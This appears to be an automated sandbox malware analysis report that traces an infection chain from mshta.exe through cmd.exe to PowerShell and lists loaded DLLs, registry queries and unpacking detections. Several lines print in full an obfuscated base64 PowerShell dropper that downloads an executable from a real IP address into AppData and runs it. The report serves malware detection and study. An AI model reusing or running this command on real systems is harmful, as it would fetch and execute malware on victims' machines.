                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.pdb source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeUnpacked PE file: 6.2.nicetomeetyousweeet.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeUnpacked PE file: 6.2.nicetomeetyousweeet.exe.400000.0.unpack
                PowerShell case anomaly found
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Suspicious command line found
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"
